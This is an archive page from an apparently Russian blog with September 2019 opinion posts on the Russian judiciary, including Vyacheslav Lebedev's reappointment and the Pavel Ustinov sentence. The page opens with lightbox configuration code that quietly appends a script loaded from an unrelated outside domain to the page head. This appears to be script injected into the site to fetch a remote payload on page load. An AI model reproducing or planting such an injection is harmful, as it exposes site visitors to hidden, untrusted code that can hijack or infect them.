, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Архив за сентября, 2019

Что ожидать от нового срока полномочий Вячеслава Лебедева?

24 Сен

Президентская кадровая комиссия утвердила https://zen.yandex.ru/media/id/5c407bc59d740a00b143d903/kadrovaia-komissiia-pri-prezidente-reshila-sudbu-viacheslava-lebedeva-5d888555027a1500ad143440   кандидатуру руководителя Верховного суда Вячеслава Лебедева на новый срок его полномочий. Ранее он получил рекомендацию на пост главы ВС от Высшей квалифколлегии судей РФ.
Читать полностью »

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Стало ли очевидным и для Путина отсутствие правосудия в стране?

20 Сен

Более двадцати лет в своих публикациях рассказываю  о том, что в России нет правосудия, как вида государственной деятельности, осуществляемой в особом порядке, установленном Конституцией и процессуальным законодательством. Однако со стороны тех, кто взялся осуществлять государственную власть, увешанных званиями и наградами «экспертов», нет никакой реакции на мои доводы. Молчит и общественность.
Читать полностью »

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Нельзя нападать на тех, кто служит Закону

19 Сен

16 сентября суд приговорил Павла Устинова к 3,5 годам колонии, признав его виновным в применении насилия к бойцу ОМОНа в ходе несогласованной акции 3 августа в Москве.

Если есть основания считать приговор неправосудным, надо обжаловать его в вышестоящих инстанциях, а также используя СМИ, аргументированно доказывать, что правосудие по данному делу отсутствовало.
Читать полностью »

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Почему молчит Путин?

18 Сен

Конституция России устанавливает, что каждому гарантируется судебная защита его прав и свобод от решений и действий (или бездействия) органов  государственной власти и должностных лиц.

Казалось, что несогласные с приговором Павлу Устинову, именно этого будут требовать от тех, кто осуществлял и осуществляет его защиту. Именно они  должны поведать общественности, что судья сделал не так.  Но этого не происходит.
Читать полностью »

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Что мешает построению в России социально-справедливого общества?

14 Сен

Актуальность ответа на этот вопрос вызвана событиями, которые происходят в стране.

Прежде всего, мешает игнорирование воли народа, изложенной в Конституции России, теми, кто взялся осуществлять государственную власть.

Произошло это в силу того, что, единственный источник власти в стране, многонациональный народ, провозгласив Россию демократическим государством, фактически устранился от контроля над тем, как осуществляется управление страной.
Читать полностью »

 
Комментариев нет

Автор: ossin Категория: Прочие заметки